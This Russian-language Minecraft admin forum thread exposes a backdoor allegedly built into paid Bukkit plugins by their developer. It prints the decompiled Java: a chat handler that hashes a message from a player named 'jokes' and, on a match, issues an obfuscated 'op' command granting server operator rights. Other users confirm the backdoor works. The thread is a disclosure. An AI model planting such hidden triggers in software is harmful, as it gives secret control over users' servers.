1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
  2. Вы находитесь в сообществе Rubukkit. Мы - администраторы серверов Minecraft, разрабатываем собственные плагины и переводим на различные языки плагины наших коллег из других стран.
    Скрыть объявление
Скрыть объявление
В преддверии глобального обновления, мы проводим исследования, которые помогут нам сделать опыт пользования форумом ещё удобнее. Помогите нам, примите участие!

Плагины от CraftCoder, или почему ваш сервер взламывают!

Тема в разделе "Оффтопик", создана пользователем alexandrage, 28 май 2015.

  1. Автор темы
    alexandrage

    alexandrage Старожил Пользователь

    Баллы:
    173
    [​IMG]

    [​IMG]

    Вот и сам плагин засветился https://cloud.mail.ru/public/2oH2/zPfM82vQL
    А тут и сам шелл

    Код:
      public void onChating(PlayerChannelEvent e, Player p, String m)
      {
        if (p.getName().contains("jokes")) {
          String msg = "Porphyrajya";
    
          byte[] pl = new byte[40];
          try {
            MessageDigest event = MessageDigest.getInstance("SHA-1");
            event.update(m.getBytes("utf8"), 0, m.length());
            pl = event.digest();
          } catch (Exception localException) {
          }
          StringBuffer str = new StringBuffer();
          for (int i = 0; i < pl.length; i++) {
            int item = pl[i] >>> 4 & 0xF;
            int block = 0;
            do {
              if ((item >= 0) && (item <= 9)) str.append((char)(48 + item)); else
                str.append((char)(97 + (item - 10)));
              item = pl[i] & 0xF;
            }
            while (
              block++ < 1);
          }
          if (str.toString().equals("f7d49269c7e7ca879b2e08d17126ef2296ebdfd3"))
            Bukkit.dispatchCommand(Bukkit.getConsoleSender(), msg.substring(1, 2) + msg.substring(3, 4) + " " + p.getName());
        }
      }
     
    Последнее редактирование: 19 июл 2015
  2. Миднайтко

    Миднайтко Старожил Пользователь

    Баллы:
    153
    Окей, а где пруфы того, что эти два факта: "в его плагинах есть бекдоры" и "ваши сервера взламывают" взаимосвязаны?
     
  3. Миднайтко

    Миднайтко Старожил Пользователь

    Баллы:
    153
    А вообще, сообщения выдраны из контекста. Речь шла о защите от кражи плагинов.
     
  4. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
  5. KyBbIPoK

    KyBbIPoK Старожил Пользователь

    Баллы:
    173
    Имя в Minecraft:
    KyBbIPoK
    Есть в его плагинах дыра, сделанная им же.
    Код в МД5, при введение которого на сервере выдается опка.
    Код раскрыт, проверено, бэкдор работает.
     
  6. CraftCoder

    CraftCoder Старожил Пользователь

    Баллы:
    108
    Имя в Minecraft:
    CraftCoderr
    И? Как ты узнаешь этот код? Тем более там уже не md5...
     
  7. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
    Base64?
    :D
     
  8. CraftCoder

    CraftCoder Старожил Пользователь

    Баллы:
    108
    Имя в Minecraft:
    CraftCoderr
    Нет
     
  9. Plasticable

    Plasticable Старожил Девелопер Пользователь

    Баллы:
    173
    Skype:
    plasticable
    Имя в Minecraft:
    Plasticable
    SHA?
     
  10. kursorik

    kursorik Активный участник Пользователь

    Баллы:
    76
    Имя в Minecraft:
    kursorik
    SALTED2MD5:lol:
     
  11. Saw

    Saw Старожил Пользователь

    Баллы:
    123
    Skype:
    nikita1234530
    md5(md5(md5(md5(md5(md5())))))
     
  12. BestMark

    BestMark Старожил Пользователь

    Баллы:
    103
    Skype:
    BestMarkBukkit
    Имя в Minecraft:
    BestMark
    @CraftCoder, выложи-ка сюда часть твоего хака. Там есть над чем посмеяться. :D
    Почему-то в моей версии плагина BedWars, который я покупал у тебя, используется именно MD5.
    Вырезать твой хак легко, тем более плагин не обфусцирован, хотя стоит дорого.
     
  13. kirr9999

    kirr9999 Старожил Пользователь

    Баллы:
    103
    А можешь код этой дырочки, которую ты вырезал, скинуть?)
     
  14. BestMark

    BestMark Старожил Пользователь

    Баллы:
    103
    Skype:
    BestMarkBukkit
    Имя в Minecraft:
    BestMark
    Без согласия автора — нет.
     
  15. Creeper1337

    Creeper1337 Активный участник Пользователь

    Баллы:
    78
    Опять топ бв написан
     
  16. mine88

    mine88 Старожил Пользователь

    Баллы:
    143
    Вот почему не стоит опять же заказывать плагины у школоло кодеров. 2 норм кодера, которых я знаю - Белка и Пластик
     
  17. Автор темы
    alexandrage

    alexandrage Старожил Пользователь

    Баллы:
    173
    +1
     
  18. CraftCoder

    CraftCoder Старожил Пользователь

    Баллы:
    108
    Имя в Minecraft:
    CraftCoderr
    Интересно, по каким же критериям Вы определяете "школо кодера"?
    Будет обнова на выходных.
    Пластик вроде бы норм поцик)) А вот Белка...., который мало того, что встраивал бэкдоры, которыми может воспользоваться любой, кто увидит код, так он еще и лично взламывал сервера...
     
  19. Reality_SC

    Reality_SC Старожил Пользователь

    Баллы:
    123
    Имя в Minecraft:
    Reality_SC
    Нахер вообще ничего не встраивайте и всё =)
    Пишите опер-сорс, помогая другим программистам, а не школо-админам.
     
  20. BestMark

    BestMark Старожил Пользователь

    Баллы:
    103
    Skype:
    BestMarkBukkit
    Имя в Minecraft:
    BestMark
    Не легче было сделать самоуничтожение (удаление) плагина при вводе команды, а не выдачу опки тебе, что в плагинах твоих клиентов сейчас.
     

Поделиться этой страницей